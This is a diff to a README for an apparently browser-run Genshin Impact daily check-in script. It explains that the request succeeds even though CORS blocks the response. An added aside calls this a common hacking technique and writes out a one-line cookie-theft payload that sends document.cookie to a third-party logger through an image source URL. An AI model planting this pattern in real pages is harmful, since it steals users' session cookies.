SlowsieNT/Genshin-Impact/README.md

 This script will send 2 requests, one will attempt to get checkin game reward, and the other request is another checkin<br>
 I have tested it on other accounts and it should be working for you as well<br>
 #### ALL SERVERS
-(Junior Developers may freak out because they'll see error in console, but in the contrary script actually works because request is sent, but the response cannot arrive due CORS)
+Junior Developers may freak out because they'll see error in console, but in the contrary script actually works because request is sent, but the response cannot arrive due CORS
+- This technique is very common in Hacking
+  - It was being used for DoS-ing
+  - Or sending `document.cookie` to the 3rd party logger website
+    - Sending `document.cookie` was mostly sent via `(new Image).src="...?_="+encodeURIComponent(document.cookie)`

 ## retrier2.ahk SETUP